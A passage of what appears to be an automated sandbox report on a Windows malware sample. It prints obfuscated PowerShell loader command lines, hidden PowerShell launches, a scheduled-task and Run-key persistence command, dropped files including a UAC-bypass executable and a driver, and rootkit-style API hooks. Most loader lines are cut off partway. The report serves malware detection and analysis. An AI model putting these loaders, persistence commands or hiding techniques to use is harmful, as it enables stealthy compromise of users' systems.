(blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91CA7DD push rcx; retf 003Fh 18_3_0000025EE91CA7DE
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31CAA7DD push rcx; retf 003Fh 19_3_000001AD31CAA7DE
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11F99C pushfd ; ret 20_2_00000113DB11F99D
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D1C7A push ebx; ret 20_2_00007FF7C14D1CEA
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55F99C pushfd ; ret 30_2_0000021E7B55F99D
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DDA7DD push rcx; retf 003Fh 36_3_00000236C6DDA7DE
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E8A7DD push rcx; retf 003Fh 44_3_0000015829E8A7DE
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A7A7DD push rcx; retf 003Fh 45_3_000001D643A7A7DE
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063183A7DD push rcx; retf 003Fh 58_3_000002063183A7DE
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE365A7DD push rcx; retf 003Fh 69_3_000001CCE365A7DE
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA2A7DD push rcx; retf 003Fh 70_3_000001858EA2A7DE
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBFA7DD push rcx; retf 003Fh 73_3_000002942EBFA7DE
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A039A7DD push rcx; retf 003Fh 83_3_000001C8A039A7DE
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF04A7DD push rcx; retf 003Fh 87_3_000001E5EF04A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD624A7DD push rcx; retf 003Fh 96_3_000002ADD624A7DE
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE6A7DD push rcx; retf 003Fh 99_3_0000021C0EE6A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6039A7DD push rcx; retf 003Fh 101_3_000001FC6039A7DE
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C735A7DD push rcx; retf 003Fh 103_3_00000161C735A7DE

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Drops PE files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Jump to dropped file
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\paint.exe Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
